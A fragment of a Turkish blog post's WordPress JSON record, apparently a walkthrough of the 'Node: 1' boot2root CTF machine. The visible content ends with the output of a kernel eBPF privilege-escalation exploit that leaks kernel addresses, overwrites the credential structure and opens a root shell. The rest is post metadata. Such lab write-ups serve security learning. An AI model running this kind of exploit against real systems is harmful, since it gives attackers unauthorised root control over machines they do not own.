bpf past the verifier\n[*] creating socketpair()\n[*] attaching bpf backdoor to socket\n[*] skbuff => ffff880027e2ce00\n[*] Leaking sock struct from ffff880029d86000\n[*] Sock->sk_rcvtimeo at offset 472\n[*] Cred structure at ffff88002b283840\n[*] UID from cred structure: 1001, matches the current: 1001\n[*] hammering cred structure at ffff88002b283840\n[*] credentials patched, launching shell...\n# id\nuid=0(root) gid=0(root) groups=0(root),1001(mark)\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
Makine Hakk\u0131nda Bilgiler A\u00e7\u0131klama: Description: Node is a medium level boot2root challenge, originally created for HackTheBox. There are two flags to find (user and root…<\/p>\n
Devam\u0131n\u0131 okuNODE: 1<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[558,557],"class_list":["post-1312","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-mongo","tag-nodejs","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1312","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1312"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1312\/revisions"}],"predecessor-version":[{"id":1313,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1312\/revisions\/1313"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1312"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1312"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1312"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}